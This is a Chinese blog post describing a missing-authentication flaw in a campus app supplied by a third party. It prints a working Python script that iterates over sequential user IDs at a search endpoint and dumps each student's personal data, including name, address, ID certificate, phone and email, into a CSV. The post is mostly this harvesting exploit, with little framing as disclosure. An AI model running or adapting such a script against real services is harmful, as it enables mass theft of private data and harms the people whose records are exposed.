美文网首页
校园提供给第三方的接口信息泄露

校园提供给第三方的接口信息泄露

作者: 折戟尘风 | 来源:发表于2018-10-30 14:51 被阅读27次

之前学校和第三方合作,让我们用到的某款app,好奇测试,发现其有严重的身份验证缺失,可以随意访问个人信息,用python写了个可以爬取所有信息的脚本。(很早之前的了,做个记录)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2018/6/23
# @Author  : XDN01
# @Site    : www.raosong.cc
# @File    : xd-xiaoweiapp-spider.py
import requests
import csv
import json

with open("./spider.csv","w",encoding='utf-8') as f:
    writer = csv.writer(f)
    key_array = ['userId','userNum','name','sex','address','certificate','nationId','nationName',
   'phone','email','schoolName','faculty','grade','class','profession','sysStuDetailId','sourceId',
    'sourceName','feature','type','suspId']
    writer.writerow(key_array)

    for a in range(2,20):
        url = 'http://example.com/search.php?userId={}'.format(a)
        json_data =requests.get(url).json()['data']
        # print(json_data)
        value_array = []
        for k in key_array:
            if k in json_data:
                value_array.append(json_data[k])
            else:
                value_array.append('null')
        # print(value_array)
        writer.writerow(value_array)
        print('第{}条数据写入完成'.format(a-1))

相关文章

  • 校园提供给第三方的接口信息泄露

    之前学校和第三方合作,让我们用到的某款app,好奇测试,发现其有严重的身份验证缺失,可以随意访问个人信息,用pyt...

  • php常见的标志注释符

    @api: 提供给第三方使用的接口@author: 标明作者@param: 参数@return: 返回值@todo...

  • Java 提供给第三方使用接口方法

    前言 相信有很多小伙伴,在日常的开发中都有遇到过需要调用第三方接口的需求吧,但是自己有没有写过接口提供给第三方使用...

  • 2022-01-21

    1主账号动态短信码验证接口 接口说明 本接口主要提供给第三方应用系统进行4A主帐号+动态短信码的认证,应用系统根据...

  • Http调用SAP RFC函数工具类

    Http 访问SAP RFC函数工具类 最近公司需要将SAP RFC函数接口提供给第三方,但是很多第三方对于RFC...

  • 17年数据安全大盘点 全球50%企业都遭遇过数据泄密事件

    根据调查数据显示,2017里全球50%以上的企业至少遭遇过一场数据泄露事件。而因为合作伙伴或第三方的原因被泄露信息...

  • 如何设计C++接口类

    基于C++语言开发的库,需要提供给第三方来调用,就必然会涉及到如何设计接口类。一般来说,有两种方法设计接口类,第一...

  • 拿什么拯救你,我的个人信息

    最近,脱口秀演员池子举报中信银行泄露个人信息, 池子发文称,中信银行在未经授权的情况下,将其个人账户流水提供给了笑...

  • 从Facebook数据泄露门中,看大数据时代下的我们!

    3月18日,Facebook被曝出数据泄露事件,5000万用户的信息被第三方机构剑桥分析公司(Cambridge ...

  • 信息泄露

    就在这几天打开手机的时候正好看到一条新闻,讲述犯人用1.7万的价格泄露全上海的学生信息。 大概是因为身处于互联网的...

网友评论

      本文标题:校园提供给第三方的接口信息泄露

      本文链接:https://www.haomeiwen.com/subject/vqegtqtx.html